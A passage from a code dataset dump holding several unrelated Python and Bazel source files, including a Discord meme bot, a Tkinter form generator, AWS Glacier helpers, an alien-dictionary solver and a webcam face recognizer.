excel\n j=0 #-> Counter for is_var(flows[3][1])\n for i in range(flows[4][0],flows[4][1]): \n if flows[3][1][j]==\"yes\":\n sheet.range(\"N\"+str(k)).value=flows[0][i]\n k+=1\n j+=1\n else:\n k+=1\n j+=1\n else:\n k=11\n j=0\n if res[0].success==True:\n for i in flows[0]:\n if i==\"x\":\n sheet.range(\"B\"+str(k)).value=x_sols[j]\n k+=1\n j+=1\n else:\n k+=1\ndef run_all():\n for i in xw.sheets: \n if i.name!=\"Restricciones\":\n run(i.name)\ndef run_single():\n run(xw.sheets.active.name)\ndef set_x_all():\n for i in xw.sheets:\n if i.name!=\"Restricciones\":\n sheet=xw.sheets[i.name]\n #Sets the flag for a feasible solution\n sheet.range(\"I4\").value=0\n #Clears the Imports values\n b=sheet.range(\"A11\").value\n j=11\n while(b!=\"TOTAL\"):\n sheet.range(\"B\"+str(j)).value=\"x\"\n j+=1\n b=sheet.range(\"A\"+str(j)).value\n \n #Clears the LNG values\n b=sheet.range(\"N11\").value\n j=11\n while(b!=\"TOTAL\"):\n sheet.range(\"N\"+str(j)).value=\"x\"\n j+=1\n b=sheet.range(\"M\"+str(j)).value\ndef set_x():\n b=xw.Range(\"A11\").value\n #Sets the flag for a feasible solution\n xw.Range(\"I4\").value=0\n #Clears the Imports values\n j=11\n while(b!=\"TOTAL\"):\n xw.Range(\"B\"+str(j)).value=\"x\"\n j+=1\n b=xw.Range(\"A\"+str(j)).value\n \n #Clears the LNG values \n b=xw.Range(\"N11\").value\n j=11\n while(b!=\"TOTAL\"):\n xw.Range(\"N\"+str(j)).value=\"x\"\n j+=1\n b=xw.Range(\"M\"+str(j)).value\n","sub_path":"Balance/Final Caja Negra/opti_buscaLNG.py","file_name":"opti_buscaLNG.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98666925","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Memes:\n \"\"\"Random commands that probably shouldn't even exist.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.angrymsgs = [\n \"When life gives you lemons, get mad!\",\n # PORTAL REFERENCING INTENSIFIES\n \"When life gives you lemons? Don't make lemonade. Make life take the lemons back! 
Get mad!\\n*'I don't want your damn lemons! What am I supposed to do with these?'*\\n\\nDemand to speak to life's manager! Make life *rue the day* it thought it could give __Cave Johnson__ *lemons*! Do you know who I am? I'm the man who's going to *burn your house down! **With the lemons!*** I'm going to get my engineers to invent a combustible lemon that *burns your house down*!\",\n \"(`ー´)\",\n \"***ANGERY INTENSIFIES***\",\n \":angry: :angry: :angry: :angry:\",\n # ANGRY K INTENSIFIES\n \"😡 😡\\n😡 😡\\n😡 😡\\n😡 😡\\n😡😡\\n😡 😡\\n😡 😡\\n😡 😡\\n😡 😡\"\n ]\n\n @commands.command()\n async def spacing(self, spacing: int, *, message: str):\n \"\"\"Adds spacing to messages. Because why not, of course?\"\"\"\n if spacing > 50 or spacing < 1:\n message = \"Spacing must be between 1 and 50\"\n spacing = 1\n if len(message) > 500:\n message = \"🤔 That message is a bit too long.\"\n output = (\" \" * spacing).join(list(message))\n if len(output) > 1500:\n await self.bot.say((\" \" * 2).join(list(\"🤔 That message is a bit too long.\")))\n await self.bot.say(output)\n\n @commands.command(pass_context=True, aliases=[\"angery\"])\n async def angry(self, ctx, user: discord.Member=None, intensity: int=None):\n \"\"\"(`ー´)\"\"\"\n u = user\n if user is None:\n await self.bot.say(random.choice(self.angrymsgs))\n else:\n if intensity == 1 or intensity == None:\n await self.bot.say(\"**(;¬_¬)** \" + u.display_name)\n elif intensity == 2:\n await self.bot.say(\"**( ಠ ಠ )** \" + u.display_name)\n elif intensity == 3:\n await self.bot.say(\"**(」゜ロ゜)」** \" + u.display_name)\n elif intensity == 4:\n await self.bot.say(\"**( #`⌂´)/┌┛** \" + u.display_name)\n elif intensity in [5,6]:\n await self.bot.say(u.display_name + \" **щ(ºДºщ)**\")\n elif intensity in [7,8,9]:\n await self.bot.say(u.display_name + \" **Щ(ಠ益ಠЩ)**\")\n elif intensity >= 10:\n await self.bot.say(u.display_name + \" **Щ(◣д◢)Щ**\")\n\n @commands.command(pass_context=True)\n async def banana(self, ctx, user: discord.Member=None):\n \"\"\"It's like banning, but with bananas! And also harmless.\"\"\"\n if user is not None and user.id == self.bot.user.id:\n await self.bot.say(\"What did __I__ do to hurt you?\")\n return\n if user is None:\n await self.bot.say(\":banana: Somehow, {0} managed to slip on their own banana.\".format(ctx.message.author.display_name))\n else:\n if random.randint(0, 100) <= 95:\n await self.bot.say(\":banana: It appears that {0} managed to ban {1} with a *banana*, of all things. How they managed that, is well beyond me.\".format(ctx.message.author.display_name, user.display_name))\n else:\n await self.bot.say(\":banana: {0} tried to ban {1} with a banana, but seems to have failed whilst doing so, and accidentally slipped on it in the process. 
Good work, {0}.\".format(ctx.message.author.display_name, user.display_name))\n\ndef setup(bot):\n bot.add_cog(Memes(bot))\n","sub_path":"memes/memes.py","file_name":"memes.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71766366","text":"import json\nfrom random import choice\nimport os\nfrom actions.Action import Action\n\nclass TalkAction(Action):\n name = \"Talk\"\n description = \"\"\"\n Just answers predefined phrases\n \"\"\".strip()\n\n def __read_phrases(self):\n phrases = os.path.join(os.path.dirname(os.path.abspath( __file__ )), 'phrases.json')\n with open(phrases) as handle:\n self.answers = json.load(handle)\n\n def __init__(self, settings={}):\n super().__init__(settings)\n self.__read_phrases()\n\n def update(self):\n self.__read_phrases()\n\n def execute(self, query, intent=None, data_collection={}):\n if intent in self.answers:\n return choice(self.answers[intent])\n else:\n return 'Doesn\\'t look like anything to me'\n\n\ndef main():\n action = TalkAction()\n print(action.execute('hello, world', 'hello'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"botkit/actions/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98306020","text":"from networking_utils.synchronous_network import SyncNetwork\nfrom networking_utils.message import Message\nimport unittest\n# from symbol import except_clause\n\nclass Test_Sync_Network(unittest.TestCase):\n def test_communication_round(self):\n \n # graph 0 - 1 - 2 - 3 - 0\n matrix1 = [[0, 1, 0, 1],\n [1, 0, 1, 0],\n [0, 1, 0, 1],\n [1, 0, 1, 0]]\n \n network = SyncNetwork(matrix1)\n \n # fill outbox of node 0 with messages to ALL other nodes\n for i in range(1, 4):\n msg = Message(0, i, {'':''})\n network.ndList[0].outbox.append(msg)\n \n network.communicationRound()\n \n # node 0's outbox should be empty\n self.failUnless(not network.ndList[0].outbox)\n \n # the only message in node 1's inbox should be addressed to node 1\n self.failUnless(network.ndList[1].inbox[0].iTargetID == 1)\n \n # ...etc.\n self.failUnless(network.ndList[2].inbox[0].iTargetID == 2)\n \n # ...etc.\n self.failUnless(network.ndList[3].inbox[0].iTargetID == 3)\n \n \nif __name__ == '__main__':\n unittest.main()","sub_path":"SDSS/src/tests/networking_utils/test_synchronous_network.py","file_name":"test_synchronous_network.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458894514","text":"'''\nLast Modified: March 22, 2021\nThis script is intended to create an import-compliant csv file \nby querying data from wikidata.org\n'''\nimport pandas as pd\nimport json\nfrom collections import OrderedDict\nimport requests, csv, sys, re\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n sys.exit(\"Missing Parent QID\")\n QID = sys.argv[1]\n #query to wikidata and make a dataframe\n try:\n url = 'https://query.wikidata.org/sparql'\n query = (\"\"\"\n SELECT DISTINCT ?childLabel ?childDescription\n WHERE\n {\n wd:\"\"\" + QID + \"\"\" wdt:P527 ?parent. \n ?parent wdt:P527 ?child\n SERVICE wikibase:label { bd:serviceParam wikibase:language \"en\". 
}\n }\n order by asc(UCASE(str(?childLabel)))\n \"\"\")\n request = requests.get(url, params = {'format': 'json', 'query': query})\n data = request.json()\n except:\n sys.exit(\"cannot complete query\")\n leaves = []\n for item in data['results']['bindings']:\n leaves.append(OrderedDict({\n 'Label': item['childLabel']['value'],\n 'Description': item['childDescription']['value']}))\n df = pd.DataFrame(leaves)\n df.to_csv(\"leaves.csv\",index=False)\n\n\n","sub_path":"Python Scripts/leaves_pathway_prep.py","file_name":"leaves_pathway_prep.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"509301868","text":"import unittest\nfrom time_calculator import *\nfrom datetime import datetime, timedelta\nimport time\n\n\nclass UnitTests(unittest.TestCase):\n def test_get_time_from_str(self):\n time_str = \"3:30 PM\"\n actual = get_time_from_str(time_str)\n expected = datetime(1900, 1, 1, 15, 30)\n self.assertEqual(\n actual, expected,\n 'Expected calling \"get_time_from_str\" with \"3:30 PM\"')\n\n def test_get_hours_from_str(self):\n hours_str = \"1:30\"\n actual = get_hours_from_str(hours_str)\n expected = timedelta(hours=1.5)\n self.assertEqual(actual, expected)\n\n def test_calculate_time(self):\n base_time = datetime(1900, 1, 1, 15, 30)\n hours = timedelta(hours=1.5)\n actual = calculate_time(base_time, hours)\n expected = datetime(1900, 1, 1, 17, 00)\n self.assertEqual(actual, expected)\n","sub_path":"test_time_calculator.py","file_name":"test_time_calculator.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"433335095","text":"import sys\nimport os\nimport treehash\nimport time\nimport logging\nimport boto3\n\ndef monitor_job(glacier_client, vault_name, job_id, timeout):\n SLEEP = int(timeout)*60 # poll every `timeout` minutes to see if the job is completed\n \n while True:\n response = glacier_client.list_jobs(\n vaultName = vault_name,\n #completed = 'true'\n )\n \n found = False\n completed = False\n \n for job in response['JobList']:\n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(job)\n if job['JobId'] == job_id:\n found = True\n completed = job['Completed']\n break\n \n if found and completed:\n if job.has_key('ArchiveSizeInBytes'):\n return int(job['ArchiveSizeInBytes'])\n else:\n return\n \n if found:\n end = time.localtime(time.time() + SLEEP)\n logging.info('Job is not completed yet, going back to sleep until %s' % time.strftime('%H:%M', end))\n time.sleep(SLEEP)\n else: \n logging.error('Job not found: %s' % job_id)\n sys.exit(2)\n\n\ndef sizeof_fmt(num, suffix='B'):\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n\ndef delete_temp_file(filename):\n os.remove(filename)\n\n\ndef get_file_size(filename):\n return os.path.getsize(filename)\n\n\ndef get_tree_hash_of_file(filename):\n BUF_SIZE = 1024**2\n tree_hash = treehash.TreeHash() # default is SHA-256 and 1 MB\n \n with open(filename, 'rb') as f:\n while True:\n data = f.read(BUF_SIZE)\n if not data:\n break\n tree_hash.update(data)\n \n return tree_hash.hexdigest()\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9790124","text":"#!/usr/bin/env python\n\"\"\"Collection of 
functions for the manipulation of time series.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport warnings\n\nimport mando\nfrom mando.rst_text_formatter import RSTHelpFormatter\n\nfrom .. import tsutils\n\nwarnings.filterwarnings(\"ignore\")\n\n\n@mando.command(\"unstack\", formatter_class=RSTHelpFormatter, doctype=\"numpy\")\n@tsutils.doc(tsutils.docstrings)\ndef unstack_cli(\n column_names,\n input_ts=\"-\",\n columns=None,\n start_date=None,\n end_date=None,\n round_index=None,\n dropna=\"no\",\n skiprows=None,\n index_type=\"datetime\",\n names=None,\n source_units=None,\n target_units=None,\n clean=False,\n tablefmt=\"csv\",\n):\n \"\"\"Return the unstack of the input table.\n\n The unstack command takes the stacked table and converts to a\n standard tstoolbox table.\n\n From::\n\n Datetime,Columns,Values\n 2000-01-01,TS1,1.2\n 2000-01-02,TS1,1.8\n 2000-01-03,TS1,1.9\n 2000-01-01,TS2,1018.2\n 2000-01-02,TS2,1453.1\n 2000-01-03,TS2,1683.1\n 2000-01-01,TS3,0.0032\n 2000-01-02,TS3,0.0002\n 2000-01-03,TS3,-0.0004\n\n To::\n\n Datetime,TS1,TS2,TS3\n 2000-01-01,1.2,1018.2,0.0032\n 2000-01-02,1.8,1453.1,0.0002\n 2000-01-03,1.9,1683.1,-0.0004\n\n Parameters\n ----------\n column_names\n The column in the table that holds the column names\n of the unstacked data.\n {input_ts}\n {columns}\n {start_date}\n {end_date}\n {dropna}\n {skiprows}\n {index_type}\n {names}\n {clean}\n {source_units}\n {target_units}\n {round_index}\n {tablefmt}\n\n \"\"\"\n tsutils.printiso(\n unstack(\n column_names,\n input_ts=input_ts,\n columns=columns,\n start_date=start_date,\n end_date=end_date,\n round_index=round_index,\n dropna=dropna,\n skiprows=skiprows,\n index_type=index_type,\n names=names,\n source_units=source_units,\n target_units=target_units,\n clean=clean,\n ),\n tablefmt=tablefmt,\n )\n\n\ndef unstack(\n column_names,\n input_ts=\"-\",\n columns=None,\n start_date=None,\n end_date=None,\n round_index=None,\n dropna=\"no\",\n skiprows=None,\n index_type=\"datetime\",\n names=None,\n source_units=None,\n target_units=None,\n clean=False,\n):\n \"\"\"Return the unstack of the input table.\"\"\"\n tsd = tsutils.common_kwds(\n tsutils.read_iso_ts(\n input_ts, skiprows=skiprows, names=names, index_type=index_type\n ),\n pick=columns,\n bestfreq=False,\n )\n\n try:\n newtsd = tsd.pivot_table(\n index=tsd.index,\n values=tsd.columns.drop(column_names),\n columns=column_names,\n aggfunc=\"first\",\n )\n except ValueError:\n raise ValueError(\n tsutils.error_wrapper(\n \"\"\"\nDuplicate index (time stamp and '{0}') where found.\nFound these duplicate indices:\n{1}\n\"\"\".format(\n column_names, tsd.index.get_duplicates()\n )\n )\n )\n\n newtsd.index.name = \"Datetime\"\n\n newtsd.columns = [\n \"_\".join(tuple(map(str, col))).rstrip(\"_\") for col in newtsd.columns.values\n ]\n\n # Remove weird characters from column names\n newtsd.rename(columns=lambda x: \"\".join([i for i in str(x) if i not in \"'\\\" \"]))\n\n newtsd = tsutils.common_kwds(\n newtsd,\n start_date=start_date,\n end_date=end_date,\n dropna=dropna,\n clean=clean,\n source_units=source_units,\n target_units=target_units,\n round_index=round_index,\n )\n\n return newtsd\n\n\nunstack.__doc__ = unstack_cli.__doc__\n","sub_path":"tstoolbox/functions/unstack.py","file_name":"unstack.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57703117","text":"# Copyright Jay Conrod. 
All rights reserved.\n\n# This file is part of rules_go_simple. Use of this source code is governed by\n# the 3-clause BSD license that can be found in the LICENSE.txt file.\n\n# def.bzl contains public definitions that may be used by Bazel projects for\n# building Go programs. These definitions should be loaded from here and\n# not any internal directory.\n\nload(\n \"//v2/internal:rules.bzl\",\n _go_binary = \"go_binary\",\n _go_library = \"go_library\",\n)\nload(\n \"//v2/internal:providers.bzl\",\n _GoLibrary = \"GoLibrary\",\n)\n\ngo_binary = _go_binary\ngo_library = _go_library\nGoLibrary = _GoLibrary\n","sub_path":"v2/def.bzl","file_name":"def.bzl","file_ext":"bzl","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462424825","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom docxtpl import DocxTemplate, InlineImage\nfrom tkinter import filedialog\nimport widgets as formEntries\nimport tkinter.ttk as ttk\n\nclass formWindow(tk.Tk):\n #a dictionary of all the widgets and their objects\n #using a lambda function to defer the creation of the objects\n widgetObjects = { \\\n \"menuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.menuEnt(self,nameVal,name,widgetId,sort),\\\n \"entry\" : lambda self,nameVal,name,widgetId,sort : formEntries.entryEnt(self,nameVal,name,widgetId,sort),\\\n \"mediMenu\" : lambda self,nameVal,name,widgetId,sort : formEntries.medicMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"ageSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.ageSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"ecgMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.ecgMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"flowButtonEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.flowButtonEnt(self,nameVal,name,widgetId,sort),\\\n \"checkUpSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.checkUpSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"nameAitEntryEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.nameAitEntryEnt(self,nameVal,name,widgetId,sort),\\\n \"bodyWeightSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.bodyWeightSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"dogDMVDCardiologicalAnalysisEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.dogDMVDCardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"weightSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.weightSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"pdfReader\" : lambda self,nameVal,name,widgetId,sort : formEntries.pdfReader(self,nameVal,name,widgetId,sort),\\\n \"auditoryFindingsMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.auditoryFindingsMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"RECardiologicalAnalysisListBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.dogDMVDRECardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"photoReader\" : lambda self,nameVal,name,widgetId,sort : formEntries.photoReader(self,nameVal,name,widgetId,sort),\\\n \"historyMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.historyMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"breedMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.breedMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"catHCMRECardiologicalAnalysisListBoxEnt\" : lambda self,nameVal,name,widgetId,sort : 
formEntries.catKfCardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort)\\\n }\n def __del__(self):\n print(\"Ending formsWindow\")\n tempKeyList = list()\n\n\n print(self.entries)\n\n\n def __init__(self,master):\n #reference to window class as master\n self.master = master\n #reference to the id of the file -> form that has been selected to be filled\n self.fileId = self.master.fileSelected[0]\n #reference to the name of the file -> form that has been selected to be filled\n self.name = self.master.fileSelected[1]\n #reference to the language of the file -> form that has been selected to be filled\n self.language = self.master.fileSelected[2]\n #reference to the animal of the file -> form that has been selected to be filled\n self.pet = self.master.fileSelected[3]\n #reference to the file name(*.docx) of the file -> form that has been selected to be filled\n self.fileName = self.master.fileSelected[4]\n #reference to all the input widgets created for this form\n self.entries = {}\n #a new frame inside the window class\n self.mainFrame = tk.Frame(self.master.window)\n #fill the mainFrame with the widgets for the file fileSelected\n self.createInputFrame()\n\n\n self.mainFrame.pack(fill = \"both\", expand = True)\n\n\n #open the list of widgets and construct them all\n def createInputFrame(self):\n #create a canvas inside the mainFrame\n self.canvas = tk.Canvas(self.mainFrame)\n #create a frame inside the canvas\n self.inputFrame = tk.Frame(self.canvas, background = \"bisque\" )\n #call getForm(fileId) to get all the widgets specified for this file\n self.form = self.master.getForm(self.fileId)\n #for every widget in the list create the object specified in the dictionary\n for widget in self.form:\n #\n obj,name,nameVal,sort = self.master.getWidget(widget)\n self.entries[name] = self.widgetObjects[obj](self,nameVal,name,widget,sort)\n\n self.inputFrame.pack()\n self.createButtonFrame()\n self.createScrollbar()\n\n #create a frame with utility buttons\n def createButtonFrame(self):\n #create a frame\n self.buttonFrame = tk.Frame(self.mainFrame)\n #create a label with the file's info (name language pet)\n self.fileSelectedLabel = tk.Label(self.buttonFrame, text = self.fileName + \"\\n\" + self.language + \"\\n\" + self.pet )\n self.fileSelectedLabel.pack(anchor = \"n\")\n #create a button to enter the information filled in the widgets\n self.enterData = tk.Button(self.buttonFrame, text = \"Enter Data\", command = self.enterdata)\n self.enterData.pack(anchor = \"center\")\n #create a button to clear the information filled in the widgets\n self.clearButton = tk.Button(self.buttonFrame, text = \"Clear Form\", command = self.clearForm)\n self.clearButton.pack(anchor = \"center\")\n #create a button to get back to the fileSelectionWindow\n self.quitButton = tk.Button(self.buttonFrame, text=\"Back to form selection\", command = self.quit)\n self.quitButton.pack(anchor = \"s\")\n\n self.buttonFrame.pack(side='right', fill = \"y\")\n #create a scroll bar inside the canvas and bind it to the mouse wheel\n def createScrollbar(self):\n self.canvas.update_idletasks()\n self.canvas.create_window(0, 0, anchor='nw', window=self.inputFrame)\n\n self.scrollBar = tk.Scrollbar(self.canvas, orient=\"vertical\", command=self.canvas.yview)\n self.scrollBar.pack(fill='y', side='right')\n\n self.canvas.configure(scrollregion=self.canvas.bbox('all'),yscrollcommand=self.scrollBar.set)\n #update the scrollbar place\n self.updateScrollBar()\n\n self.canvas.pack(fill='both', expand=True, side='left')\n\n 
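#(Added note, not in the original source) the bind_all(\"<MouseWheel>\") call\n #below uses the Windows/macOS wheel event; on Windows event.delta arrives in\n #multiples of 120 per notch, which is why onMouseWheel divides by 120.\n #On X11 one would bind \"<Button-4>\"/\"<Button-5>\" instead.\n 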
self.canvas.bind_all(\"<MouseWheel>\", self.onMouseWheel)\n #update the scrollbar view\n def updateScrollBar(self):\n self.canvas.configure(scrollregion=self.canvas.bbox('all'),yscrollcommand=self.scrollBar.set)\n #every mouse wheel bind for events\n def onMouseWheel(self, event):\n scrollDir = int(event.delta/120)\n self.canvas.yview('scroll',-1*scrollDir, \"units\")\n self.updateScrollBar()\n\n\n def clearForm(self):\n answer = messagebox.askyesno('You do not appreciate the work that your slave has done so far','Do you need slave to clear the board and start all over?')\n if answer:\n self.clearWidgets()\n\n def quit(self):\n answer = messagebox.askyesno('You need your slave to handle another task','Do you need slave to get you back to the form selection window?')\n if answer:\n self.goBack()\n\n #to clear the widgets the canvas and the buttonFrame are destroyed and re-created\n def clearWidgets(self):\n self.canvas.destroy()\n self.buttonFrame.destroy()\n self.createInputFrame()\n\n #to get back to the fileSelectionWindow the fileSelected parameter is set to None\n #the mainFrame with the widgets is destroyed\n #and the function checkState is being called\n def goBack(self):\n self.master.fileSelected = None\n self.master.window.destroy()\n self.master.checkState()\n\n #a function to collect all the data from the widgets and create the docx file\n def enterdata(self):\n #get the string file path and name\n filePath = self.master.path+\"\\\\Protipa\\\\\" + self.fileName\n #make a DocxTemplate object\n doc = DocxTemplate(filePath)\n context = {}\n #make a loading bar into the buttonFrame\n self.loadingBar = ttk.Progressbar(self.buttonFrame, orient = \"horizontal\", length = 100, mode = 'determinate')\n self.loadingBar.pack(anchor = \"s\")\n #divide the progress bar into equal pieces, depending on how many widgets have been made\n loadingBarValue = 100/len(self.entries)\n #for every widget in the entries dictionary\n for ent in self.entries:\n #call the getWidgetValues function and store it in input\n input = self.entries[ent].getWidgetValues()\n #call the loadingBarProgress\n self.loadingBarProgress(loadingBarValue)\n\n if input == None :\n pass\n #if there has been any change in the widgets\n else:\n #check if the input comes from the photo widget, in order to create an InlineImage object\n temp = []\n if ent == \"PHOTOS\":\n for image in input:\n myImage = InlineImage(doc, image )\n temp.append(myImage)\n else:\n temp = input\n #append the data from the input to the context dictionary\n context[ent] = temp\n\n #render the context dictionary\n doc.render(context)\n print(context)\n #clear the filePath parameter\n filePath = \"\"\n #make a string of the path for the new file to be saved at\n filePath = filedialog.asksaveasfilename(title = \"Select file\",filetypes = [(\"docx files\",\"*.docx\")])\n if filePath == \"\":\n #if the path is empty destroy the loading bar\n self.loadingBar.destroy()\n else:\n #add the .docx to the file\n filePath += \".docx\"\n #save the file\n doc.save(filePath)\n #give the choice to go back to fileSelectionWindow or clear the widgets of the forms window\n answer = messagebox.askyesno('Make slave keep working on this form','Whip slave and make him go back to work?')\n if answer:\n self.clearWidgets()\n else:\n self.goBack()\n\n def calcWeight(self,weight):\n indexes = self.master.getPetWeightIndex(self.pet)\n if weight <= indexes[0]:\n return \"small\"\n elif weight <= indexes[1]:\n return \"average\"\n else:\n return \"tooMuch\"\n\n def calcAge(self,age):\n indexes = 
self.master.getPetAgeIndex(self.pet)\n if age < indexes[0]:\n return \"young\"\n elif age < indexes[1]:\n return \"adult\"\n else:\n return \"elder\"\n\n def loadingBarProgress(self,val):\n self.loadingBar['value'] = self.loadingBar['value'] + val\n self.buttonFrame.update_idletasks()\n","sub_path":"formsWindow.py","file_name":"formsWindow.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"208122804","text":"from collections import deque\nfrom collections import defaultdict\nclass Solution(object):\n\tdef getCmp(self, word1, word2, cmps):\n\t\t\"\"\"\n\t\t:return FALSE when error \n\t\t:type word1: str\n\t\t:type word2: str\n\t\t:type cmps: set\n\t\t:rtype: boolean\n\t\t\"\"\"\n\t\tfor i, c1 in enumerate(word1): #this function does not detect the 'xy vs yx' case, because the last line handles that\n\t\t\tif i >= len(word2): #a pair like 'xyc and xy' provides no ordering information\n\t\t\t\treturn False\n\t\t\tif c1 != word2[i]:\n\t\t\t\tcmps.add((c1, word2[i]))\n\t\t\t\tbreak\n\t\treturn True\n\t\t\n\t\n\tdef alienOrder(self, words):\n\t\t\"\"\"\n\t\t:type words: List[str]\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tcmps = set()\n\t\tallChars = set()\n\t\tfor i, word1 in enumerate(words):\n\t\t\tfor c in word1:\n\t\t\t\tallChars.add(c) #put every char into the set\n\t\t\tfor word2 in words[i + 1:]:\n\t\t\t\tif not self.getCmp(word1, word2, cmps):\n\t\t\t\t\treturn \"\"\n\t\treturn \"\".join(self.tpsort(cmps, allChars))\n\t\t\n\tdef tpsort(self, cmps, allChars):\n\t\t\"\"\"\n\t\t:type words: set[(char, char)]\n\t\t:rtype: list[char]\n\t\t\"\"\"\n\t\tdpenedMap = defaultdict(set)\n\t\tdpenNums = defaultdict(int)\n\t\tfor cmp in cmps:\n\t\t\tdpenedMap[cmp[0]].add(cmp[1])\n\t\t\tif cmp[0] != cmp[1]:\n\t\t\t\tdpenNums[cmp[1]] += 1\n\t\tq = []\n\t\tfor char in allChars:\n\t\t\tif dpenNums[char] == 0:\n\t\t\t\tq.append(char)\n\t\tindex = 0\n\t\twhile index < len(q):#BFS template: keep q intact, so advance an index instead of popping\n\t\t\tcur = q[index]\n\t\t\tindex += 1\n\t\t\tfor dpen in dpenedMap[cur]:\n\t\t\t\tdpenNums[dpen] -= 1\n\t\t\t\tif dpenNums[dpen] == 0:\n\t\t\t\t\tq.append(dpen)\n\t\treturn q if len(allChars) == len(q) else [] #prevents deadlock (a cycle in the ordering)\n\t\t\t\n\t\t\n\t\t\n\n","sub_path":"shuhan/facebook/shuhan/hard/LC269. Alien Dictionary.py","file_name":"LC269. 
Alien Dictionary.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362230376","text":"import cv2\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nimport os\ncap = cv2.VideoCapture(0)\nclassifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nmodel = KNeighborsClassifier()\ndata = np.load('faces.npy')\nX,Y = data[:,1:].astype(np.int),data[:,0]\nmodel.fit(X,Y)\nwhile True:\n ret, frame = cap.read()\n if ret:\n face = classifier.detectMultiScale(frame)\n if len(face) > 0:\n np_face = np.array(face)\n best_face = np.product(np_face[:, 2:], axis=1).argmax()\n x, y, w, h = face[best_face]\n crop = frame[y:y + h, x:x + w]\n face_img = cv2.resize(crop, (100, 100))\n face_gray = cv2.cvtColor(face_img,cv2.COLOR_RGB2BGR)\n face_flat = face_gray.flatten()\n fin_face = model.predict([face_flat])\n image = cv2.putText(frame,fin_face[0],(x, y), cv2.FONT_HERSHEY_SIMPLEX,fontScale= 3,color= (255, 0, 0),thickness= 4)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 5)\n cv2.imshow('Main video', frame)\n\n key = cv2.waitKey(1)\n if ord('q') == key:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359916336","text":"import numpy as np\nimport pandas as pd\nimport neuroseries as nts\nfrom pylab import *\nfrom wrappers import *\nfrom functions import *\nimport sys\n\n\ndata_directory = '/mnt/DataGuillaume/LMN/A1407/A1407-190416'\n\n\nepisodes = ['sleep', 'wake', 'sleep']\n\nevents = ['1']\n\n\n\nspikes, shank \t\t\t\t\t\t= loadSpikeData(data_directory)\nn_channels, fs, shank_to_channel \t= loadXML(data_directory)\nposition \t\t\t\t\t\t\t= loadPosition(data_directory, events, episodes)\nwake_ep \t\t\t\t\t\t\t= loadEpoch(data_directory, 'wake', episodes)\nsleep_ep \t\t\t\t\t\t\t= loadEpoch(data_directory, 'sleep')\t\t\t\t\t\nacceleration\t\t\t\t\t\t= 